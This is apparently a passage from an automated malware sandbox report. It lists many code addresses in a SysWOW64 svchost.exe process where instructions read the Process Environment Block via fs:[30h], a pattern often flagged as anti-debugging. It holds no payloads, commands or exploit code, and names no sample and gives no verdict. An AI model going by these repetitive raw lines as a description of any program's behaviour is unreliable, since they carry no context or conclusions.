                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A2C3 mov eax, dword ptr fs:[00000030h]1_2_0303A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031062D6 mov eax, dword ptr fs:[00000030h]1_2_031062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030402E1 mov eax, dword ptr fs:[00000030h]1_2_030402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030402E1 mov eax, dword ptr fs:[00000030h]1_2_030402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030402E1 mov eax, dword ptr fs:[00000030h]1_2_030402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE10E mov eax, dword ptr fs:[00000030h]1_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE10E mov ecx, dword ptr fs:[00000030h]1_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE10E mov eax, dword ptr fs:[00000030h]1_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE10E mov eax, dword ptr fs:[00000030h]1_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE10E mov ecx, dword ptr fs:[00000030h]1_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE10E mov eax, dword ptr fs:[00000030h]1_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE10E mov eax, dword ptr fs:[00000030h]1_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE10E mov ecx, dword ptr fs:[00000030h]1_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE10E mov eax, dword ptr fs:[00000030h]1_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE10E mov ecx, dword ptr fs:[00000030h]1_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DA118 mov ecx, dword ptr fs:[00000030h]1_2_030DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DA118 mov eax, dword ptr fs:[00000030h]1_2_030DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DA118 mov eax, dword ptr fs:[00000030h]1_2_030DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DA118 mov eax, dword ptr fs:[00000030h]1_2_030DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F0115 mov eax, dword ptr fs:[00000030h]1_2_030F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03060124 mov eax, dword ptr fs:[00000030h]1_2_03060124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C4144 mov eax, dword ptr fs:[00000030h]1_2_030C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C4144 mov eax, dword ptr fs:[00000030h]1_2_030C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C4144 mov ecx, dword ptr fs:[00000030h]1_2_030C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C4144 mov eax, dword ptr fs:[00000030h]1_2_030C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C4144 mov eax, dword ptr fs:[00000030h]1_2_030C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302C156 mov eax, dword ptr fs:[00000030h]1_2_0302C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C8158 mov eax, dword ptr fs:[00000030h]1_2_030C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03036154 mov eax, dword ptr fs:[00000030h]1_2_03036154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03036154 mov eax, dword ptr fs:[00000030h]1_2_03036154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104164 mov eax, dword ptr fs:[00000030h]1_2_03104164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104164 mov eax, dword ptr fs:[00000030h]1_2_03104164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03070185 mov eax, dword ptr fs:[00000030h]1_2_03070185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EC188 mov eax, dword ptr fs:[00000030h]1_2_030EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EC188 mov eax, dword ptr fs:[00000030h]1_2_030EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D4180 mov eax, dword ptr fs:[00000030h]1_2_030D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D4180 mov eax, dword ptr fs:[00000030h]1_2_030D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B019F mov eax, dword ptr fs:[00000030h]1_2_030B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B019F mov eax, dword ptr fs:[00000030h]1_2_030B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B019F mov eax, dword ptr fs:[00000030h]1_2_030B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B019F mov eax, dword ptr fs:[00000030h]1_2_030B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302A197 mov eax, dword ptr fs:[00000030h]1_2_0302A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302A197 mov eax, dword ptr fs:[00000030h]1_2_0302A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302A197 mov eax, dword ptr fs:[00000030h]1_2_0302A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031021AE mov eax, dword ptr fs:[00000030h]1_2_031021AE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F61C3 mov eax, dword ptr fs:[00000030h]1_2_030F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F61C3 mov eax, dword ptr fs:[00000030h]1_2_030F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE1D0 mov eax, dword ptr fs:[00000030h]1_2_030AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE1D0 mov eax, dword ptr fs:[00000030h]1_2_030AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE1D0 mov ecx, dword ptr fs:[00000030h]1_2_030AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE1D0 mov eax, dword ptr fs:[00000030h]1_2_030AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE1D0 mov eax, dword ptr fs:[00000030h]1_2_030AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031061E5 mov eax, dword ptr fs:[00000030h]1_2_031061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030601F8 mov eax, dword ptr fs:[00000030h]1_2_030601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B4000 mov ecx, dword ptr fs:[00000030h]1_2_030B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]1_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]1_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]1_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]1_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]1_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]1_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]1_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]1_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E016 mov eax, dword ptr fs:[00000030h]1_2_0304E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E016 mov eax, dword ptr fs:[00000030h]1_2_0304E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E016 mov eax, dword ptr fs:[00000030h]1_2_0304E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E016 mov eax, dword ptr fs:[00000030h]1_2_0304E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302A020 mov eax, dword ptr fs:[00000030h]1_2_0302A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302C020 mov eax, dword ptr fs:[00000030h]1_2_0302C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C6030 mov eax, dword ptr fs:[00000030h]1_2_030C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03032050 mov eax, dword ptr fs:[00000030h]1_2_03032050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B6050 mov eax, dword ptr fs:[00000030h]1_2_030B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305C073 mov eax, dword ptr fs:[00000030h]1_2_0305C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303208A mov eax, dword ptr fs:[00000030h]1_2_0303208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030280A0 mov eax, dword ptr fs:[00000030h]1_2_030280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C80A8 mov eax, dword ptr fs:[00000030h]1_2_030C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F60B8 mov eax, dword ptr fs:[00000030h]1_2_030F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F60B8 mov ecx, dword ptr fs:[00000030h]1_2_030F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B20DE mov eax, dword ptr fs:[00000030h]1_2_030B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0302A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030380E9 mov eax, dword ptr fs:[00000030h]1_2_030380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B60E0 mov eax, dword ptr fs:[00000030h]1_2_030B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302C0F0 mov eax, dword ptr fs:[00000030h]1_2_0302C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030720F0 mov ecx, dword ptr fs:[00000030h]1_2_030720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306C700 mov eax, dword ptr fs:[00000030h]1_2_0306C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03030710 mov eax, dword ptr fs:[00000030h]1_2_03030710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03060710 mov eax, dword ptr fs:[00000030h]1_2_03060710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306C720 mov eax, dword ptr fs:[00000030h]1_2_0306C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306C720 mov eax, dword ptr fs:[00000030h]1_2_0306C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306273C mov eax, dword ptr fs:[00000030h]1_2_0306273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306273C mov ecx, dword ptr fs:[00000030h]1_2_0306273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306273C mov eax, dword ptr fs:[00000030h]1_2_0306273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AC730 mov eax, dword ptr fs:[00000030h]1_2_030AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306674D mov esi, dword ptr fs:[00000030h]1_2_0306674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306674D mov eax, dword ptr fs:[00000030h]1_2_0306674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306674D mov eax, dword ptr fs:[00000030h]1_2_0306674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03030750 mov eax, dword ptr fs:[00000030h]1_2_03030750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BE75D mov eax, dword ptr fs:[00000030h]1_2_030BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072750 mov eax, dword ptr fs:[00000030h]1_2_03072750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072750 mov eax, dword ptr fs:[00000030h]1_2_03072750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03038770 mov eax, dword ptr fs:[00000030h]1_2_03038770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D678E mov eax, dword ptr fs:[00000030h]1_2_030D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030307AF mov eax, dword ptr fs:[00000030h]1_2_030307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E47A0 mov eax, dword ptr fs:[00000030h]1_2_030E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303C7C0 mov eax, dword ptr fs:[00000030h]1_2_0303C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B07C3 mov eax, dword ptr fs:[00000030h]1_2_030B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030527ED mov eax, dword ptr fs:[00000030h]1_2_030527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030527ED mov eax, dword ptr fs:[00000030h]1_2_030527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030527ED mov eax, dword ptr fs:[00000030h]1_2_030527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BE7E1 mov eax, dword ptr fs:[00000030h]1_2_030BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030347FB mov eax, dword ptr fs:[00000030h]1_2_030347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030347FB mov eax, dword ptr fs:[00000030h]1_2_030347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE609 mov eax, dword ptr fs:[00000030h]1_2_030AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]1_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]1_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]1_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]1_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]1_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]1_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]1_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072619 mov eax, dword ptr fs:[00000030h]1_2_03072619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E627 mov eax, dword ptr fs:[00000030h]1_2_0304E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03066620 mov eax, dword ptr fs:[00000030h]1_2_03066620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03068620 mov eax, dword ptr fs:[00000030h]1_2_03068620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303262C mov eax, dword ptr fs:[00000030h]1_2_0303262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304C640 mov eax, dword ptr fs:[00000030h]1_2_0304C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F866E mov eax, dword ptr fs:[00000030h]1_2_030F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F866E mov eax, dword ptr fs:[00000030h]1_2_030F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A660 mov eax, dword ptr fs:[00000030h]1_2_0306A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A660 mov eax, dword ptr fs:[00000030h]1_2_0306A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03062674 mov eax, dword ptr fs:[00000030h]1_2_03062674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03034690 mov eax, dword ptr fs:[00000030h]1_2_03034690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03034690 mov eax, dword ptr fs:[00000030h]1_2_03034690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306C6A6 mov eax, dword ptr fs:[00000030h]1_2_0306C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030666B0 mov eax, dword ptr fs:[00000030h]1_2_030666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0306A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A6C7 mov eax, dword ptr fs:[00000030h]1_2_0306A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE6F2 mov eax, dword ptr fs:[00000030h]1_2_030AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE6F2 mov eax, dword ptr fs:[00000030h]1_2_030AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE6F2 mov eax, dword ptr fs:[00000030h]1_2_030AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE6F2 mov eax, dword ptr fs:[00000030h]1_2_030AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B06F1 mov eax, dword ptr fs:[00000030h]1_2_030B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B06F1 mov eax, dword ptr fs:[00000030h]1_2_030B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C6500 mov eax, dword ptr fs:[00000030h]1_2_030C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]1_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]1_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]1_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]1_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]1_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]1_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]1_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040535 mov eax, dword ptr fs:[00000030h]1_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040535 mov eax, dword ptr fs:[00000030h]1_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040535 mov eax, dword ptr fs:[00000030h]1_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040535 mov eax, dword ptr fs:[00000030h]1_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040535 mov eax, dword ptr fs:[00000030h]1_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040535 mov eax, dword ptr fs:[00000030h]1_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E53E mov eax, dword ptr fs:[00000030h]1_2_0305E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E53E mov eax, dword ptr fs:[00000030h]1_2_0305E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E53E mov eax, dword ptr fs:[00000030h]1_2_0305E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E53E mov eax, dword ptr fs:[00000030h]1_2_0305E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E53E mov eax, dword ptr fs:[00000030h]1_2_0305E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03038550 mov eax, dword ptr fs:[00000030h]1_2_03038550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03038550 mov eax, dword ptr fs:[00000030h]1_2_03038550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306656A mov eax, dword ptr fs:[00000030h]1_2_0306656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306656A mov eax, dword ptr fs:[00000030h]1_2_0306656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306656A mov eax, dword ptr fs:[00000030h]1_2_0306656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03032582 mov eax, dword ptr fs:[00000030h]1_2_03032582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03032582 mov ecx, dword ptr fs:[00000030h]1_2_03032582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03064588 mov eax, dword ptr fs:[00000030h]1_2_03064588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E59C mov eax, dword ptr fs:[00000030h]1_2_0306E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B05A7 mov eax, dword ptr fs:[00000030h]1_2_030B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B05A7 mov eax, dword ptr fs:[00000030h]1_2_030B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B05A7 mov eax, dword ptr fs:[00000030h]1_2_030B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030545B1 mov eax, dword ptr fs:[00000030h]1_2_030545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030545B1 mov eax, dword ptr fs:[00000030h]1_2_030545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E5CF mov eax, dword ptr fs:[00000030h]1_2_0306E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E5CF mov eax, dword ptr fs:[00000030h]1_2_0306E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030365D0 mov eax, dword ptr fs:[00000030h]1_2_030365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A5D0 mov eax, dword ptr fs:[00000030h]1_2_0306A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A5D0 mov eax, dword ptr fs:[00000030h]1_2_0306A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]1_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]1_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]1_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]1_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]1_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]1_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]1_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]1_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030325E0 mov eax, dword ptr fs:[00000030h]1_2_030325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306C5ED mov eax, dword ptr fs:[00000030h]1_2_0306C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306C5ED mov eax, dword ptr fs:[00000030h]1_2_0306C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03068402 mov eax, dword ptr fs:[00000030h]1_2_03068402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03068402 mov eax, dword ptr fs:[00000030h]1_2_03068402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03068402 mov eax, dword ptr fs:[00000030h]1_2_03068402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302E420 mov eax, dword ptr fs:[00000030h]1_2_0302E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302E420 mov eax, dword ptr fs:[00000030h]1_2_0302E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302E420 mov eax, dword ptr fs:[00000030h]1_2_0302E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302C427 mov eax, dword ptr fs:[00000030h]1_2_0302C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]1_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]1_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]1_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]1_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]1_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]1_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]1_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]1_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]1_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]1_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]1_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]1_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]1_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]1_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]1_2_0306E443
